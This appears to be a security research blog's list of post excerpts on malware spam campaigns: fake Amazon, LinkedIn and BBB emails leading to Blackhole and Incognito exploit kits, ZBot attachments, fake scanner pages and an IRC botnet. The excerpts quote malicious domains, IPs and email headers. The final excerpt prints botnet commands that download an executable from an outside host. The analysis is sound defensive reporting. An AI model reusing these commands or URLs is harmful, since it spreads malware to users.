WordPress-how-to-videos(dot)com Spreads Java Exploits

When we analyzed few Twitter followers in one of our websites, we noted that there was an user that was following us, see the image: We have analyzed the website (infected): www (dot) wordpress-how-to-videos (dot) com The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220.34.22 (330.hostserv.eu). The server […]

Amazon.com Order Confirmation leads to Blackhole Exploit Kit

We received few emails with subject: Amazon.com Order Confirmation Inside the email message there is a HREF link that redirects users to a malicious web page containing malicious javascript code used to redirect users to the main URL of Blackhole exploit kit: The Blackhole exploit kit URL is: GET /main.php?page=017f3bb5c2be6a41 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE […]

Spam “Your Bill Me Later notice” leads to Incognito exploit kit

Users have reported another malicious email message with subject “Your Bill Me Later notice” that states you have made a payment over the phone of $60.12 to Bill Me Later website. The email body is full of HREF links that point to a lot of malicious URLs, view a screenshot of the email message: Email […]

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that looks like to be sent by LinedIn: The email header info shows it is a scam: Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24]) Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net Date: Fri, 04 May 2012 08:34:11 -0700 From: "Order" @fixnot.com.tr Subject: Link LinkedIn Mail The email body contains also few […]

Express LinkedIn Mail: spread Blackhole Exploit Kit URLs

We have received few emails that looked like to be sent from LinkedIn: But after checking email header details it was clearly a spam: Return-Path: trtro@www.trt.ro Received: from vps136.whmpanels.com (unknown [89.42.219.181]) Received: from [95.6.42.101] (helo=www.trt.ro) by vps136.whmpanels.com Date: Fri, 30 Mar 2012 21:37:47 +0100 From: "Support" trtro@www.trt.ro Subject: Express LinkedIn Mail The A HREF links […]

Spam “Your updated information is necessary” leads to Blackhole Exploit Kit

We have received various spam emails that simulate messages from Better Business Bureau (BBB), but in real are used to spread malicious links that leads to Blackhole Exploit Kit. The subject of the emails looks like this: Your updated information is necessary A screenshot of the email: Other details of the emails: Return-Path: <top-team3@ms16.hinet.net> Received: […]

Browsers Exploits Delivered as HTML Attachment

We have logged more than 300 email messages with attached various HTML files containing obfuscated javascript code that is used to redirect the users to download malicious executable files that install the ZBot banking trojan. We also noticed that some HTML files have redirected us to external urls containing web browsers exploit kits with the […]

Google Translate used by spammers to bypass Anti-Spam filters

Google Translate is a free service created by Google that translates any web page, content or document from native language to a language specified by the user that is using the service. We have noticed that some spam messages contain links to websites that use the service Google Translate to translate their page content, but […]

Malicious URLs Hosting Fake Scanner Pages

We have detected few fake scanner pages that are still active and that distribute the dangerous executable files of rogue security software. First initial fake alert: Fake scanner page in action: Prompt to download the (infected) setup file of the rogue software: Report date: 2011-04-15 01:10:23 (GMT 1) File name: bestav2-exe File size: 374784 bytes […]

IRC Botnet Logs with MSN Spreader

We noticed the following details in a log file in our sandbox: :m{IT|XXX}agaigyu!agaigyu@hostXXX.it JOIN :#ngr :Apache2.0 332 m{IT|XXX}agaigyu #ngr :.j -c FRA,ESP,ITA #it .dl http://efirst-data. in/install.48208.exe .mod msn on .msn.int # .msn.set http://image4msn. com/ :Apache2.0 333 m{IT|XXX}agaigyu #ngr xxx 1301238177 These details are related to an IRC botnet and we can extract few commands: 1. […]